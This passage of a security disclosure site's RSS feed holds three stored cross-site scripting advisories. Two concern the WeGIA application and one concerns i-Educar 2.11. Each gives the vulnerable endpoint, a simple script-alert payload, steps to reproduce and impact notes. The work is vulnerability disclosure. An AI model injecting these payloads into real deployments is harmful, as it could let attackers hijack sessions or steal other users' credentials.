&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;h1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;h1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;steps-to-reproduce&amp;#34;&amp;gt;Steps to Reproduce:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;1.&amp;lt;/b&amp;gt; Register a patient where the “Name” field contains the payload.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;2.&amp;lt;/b&amp;gt; Navigate to the “Patient Information” page for the created patient.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;3.&amp;lt;/b&amp;gt; Observe that the payload is executed in the browser:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-40283/image.png&amp;#34;
	width=&amp;#34;1360&amp;#34;
	height=&amp;#34;737&amp;#34;
	srcset=&amp;#34;/p/cve-2026-40283/image_hu_7406d057c64135fd.png 480w, /p/cve-2026-40283/image_hu_47e3d68f29444a6d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;184&amp;#34;
		data-flex-basis=&amp;#34;442px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-x74c-gwj9-6cwr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-x74c-gwj9-6cwr&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/thiago50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Thiago Escarrone&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 17 Apr 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2026-40284</title>
        <link>https://www.cvehunters.com/p/cve-2026-40284/</link>
        <guid>https://www.cvehunters.com/p/cve-2026-40284/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2026-40284-cross-site-scripting-xss-stored-in-listar_despachosphp&amp;#34;&amp;gt;CVE-2026-40284: Cross-Site Scripting (XSS) Stored in &amp;lt;code&amp;gt;listar_despachos.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-40284&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-40284&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript via the “Destinatário” field. The payload is stored and later executed when viewing the dispatch page, impacting other users.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize or escape the “Destinatário” field, which is populated with user-controlled data (nome do usuário). When a despacho is created using a maliciously crafted name containing HTML/JavaScript, this value is stored in the system.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;During the rendering of the dispatch listing page, the application inserts this data into the DOM using .html(), causing the browser to interpret and execute the injected code.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;This results in a Stored XSS vulnerability due to improper output encoding of user-controlled data.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2026-40284-cross-site-scripting-xss-stored-in-listar_despachosphp&amp;#34;&amp;gt;CVE-2026-40284: Cross-Site Scripting (XSS) Stored in &amp;lt;code&amp;gt;listar_despachos.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-40284&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-40284&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript via the “Destinatário” field. The payload is stored and later executed when viewing the dispatch page, impacting other users.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize or escape the “Destinatário” field, which is populated with user-controlled data (nome do usuário). When a despacho is created using a maliciously crafted name containing HTML/JavaScript, this value is stored in the system.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;During the rendering of the dispatch listing page, the application inserts this data into the DOM using .html(), causing the browser to interpret and execute the injected code.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;This results in a Stored XSS vulnerability due to improper output encoding of user-controlled data.&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;listar_despachos.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;h1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;h1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;steps-to-reproduce&amp;#34;&amp;gt;Steps to Reproduce:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;1.&amp;lt;/b&amp;gt; Alter the name of a user (or create one) with the payload.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;2.&amp;lt;/b&amp;gt; Create a despacho selecting this user as “Destinatário”.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;3.&amp;lt;/b&amp;gt; Access the page that lists or displays the despacho.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;4.&amp;lt;/b&amp;gt; Observe that the payload is executed in the browser:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-40284/image.png&amp;#34;
	width=&amp;#34;884&amp;#34;
	height=&amp;#34;751&amp;#34;
	srcset=&amp;#34;/p/cve-2026-40284/image_hu_b5a29259f27a9224.png 480w, /p/cve-2026-40284/image_hu_d02bb8cf295854e3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;117&amp;#34;
		data-flex-basis=&amp;#34;282px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mccp-8446-phw5&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mccp-8446-phw5&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/thiago50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Thiago Escarrone&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 17 Apr 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2026-4355</title>
        <link>https://www.cvehunters.com/p/cve-2026-4355/</link>
        <guid>https://www.cvehunters.com/p/cve-2026-4355/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2026-4355-cross-site-scripting-xss-stored-in-new-educar_servidor_curso_lst-parameter-name&amp;#34;&amp;gt;CVE-2026-4355: Cross-Site Scripting (XSS) Stored in new &amp;lt;code&amp;gt;educar_servidor_curso_lst&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-4355&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-4355&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_servidor_curso_lst.php&amp;lt;/code&amp;gt; endpoint of the I-educar 2.11 application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the &amp;lt;code&amp;gt;ComponenteCurricular/view&amp;lt;/code&amp;gt; page is accessed by users, representing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_servidor_curso_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2026-4355-cross-site-scripting-xss-stored-in-new-educar_servidor_curso_lst-parameter-name&amp;#34;&amp;gt;CVE-2026-4355: Cross-Site Scripting (XSS) Stored in new &amp;lt;code&amp;gt;educar_servidor_curso_lst&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-4355&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-4355&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_servidor_curso_lst.php&amp;lt;/code&amp;gt; endpoint of the I-educar 2.11 application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the &amp;lt;code&amp;gt;ComponenteCurricular/view&amp;lt;/code&amp;gt; page is accessed by users, representing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_servidor_curso_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(1)&amp;amp;lt;/script&amp;amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;steps-to-reproduce&amp;#34;&amp;gt;Steps to Reproduce:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; Register the payload in the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; field at the &amp;lt;code&amp;gt;educar_servidor_curso_lst.php&amp;lt;/code&amp;gt; endpoint.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-4355/image.png&amp;#34;
	width=&amp;#34;1655&amp;#34;
	height=&amp;#34;336&amp;#34;
	srcset=&amp;#34;/p/cve-2026-4355/image_hu_f0d344b2348566d2.png 480w, /p/cve-2026-4355/image_hu_6c0417b053954c44.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;492&amp;#34;
		data-flex-basis=&amp;#34;1182px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; After that, the XSS can be triggered by opening the &amp;lt;code&amp;gt;educar_servidor_curso_lst.php&amp;lt;/code&amp;gt; endpoint corresponding to the edited ID.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-4355/image-1.png&amp;#34;
	width=&amp;#34;1655&amp;#34;
	height=&amp;#34;336&amp;#34;
	srcset=&amp;#34;/p/cve-2026-4355/image-1_hu_304eccbb94dee2b4.png 480w, /p/cve-2026-4355/image-1_hu_6a7e07ce80a625ac.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;492&amp;#34;
		data-flex-basis=&amp;#34;1182px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Saiipe/CVE/blob/main/i-educar%2FCVE-2026-4355.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/Saiipe/CVE/blob/main/i-educar%2FCVE-2026-4355.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/itauan&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/itauan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/itauan&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Itauan Santos&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
